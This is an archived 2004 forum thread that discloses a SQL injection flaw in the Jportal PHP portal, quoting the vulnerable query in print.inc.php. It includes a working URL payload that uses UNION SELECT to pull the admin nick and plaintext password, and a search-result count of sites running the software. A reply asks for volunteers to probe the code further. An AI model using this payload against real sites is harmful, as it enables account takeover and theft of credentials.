Jportal Sql Injects

GovernmentSecurity.org > The Archives > Exploit Articles

qcred11

May 29 2004, 05:21 PM

QUOTE

Jportal is a portal system, quite commonly used:

(Google)
Results 1 - 10 of about 56,100 for "powered by jportal". (0.22 seconds)

Homepage:
http://jportal2.com/

I've read its code and found:

in module/print.inc.php:

function art_print() {
....
$query = "SELECT * FROM $art_tbl WHERE id=$id";
...
}

What to say? ;]

example exploitation:
http://xxxxx/print.php?what=article&id=X AND 1=0 UNION SELECT id,id,nick,pass,id,id,id,id,id from admins LIMIT 1

result: unhashed admin password.

There are a lot more bugs in it, imho whole system should be rewritten from a scratch (also using password
hashing is a good thing i think

Maciek 'ziemniaq' Wierciski

virus

Jun 3 2004, 03:57 AM

No one wants to work here I guess ... they just like to be spoon fed. I've downloaded the JPORTAL thing and I'v been trying to get through the shit. Just need more time and I guess I'd be through. Amazing how the fool (person who developed the portal) hasn't put much checks except for the admin login. I'm happy he remembered to put SQL checks at the login atleast

How about some team work here ?

any volunteers?

P.S: I develop in php but not hardcore. Just reading up to harden my code

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.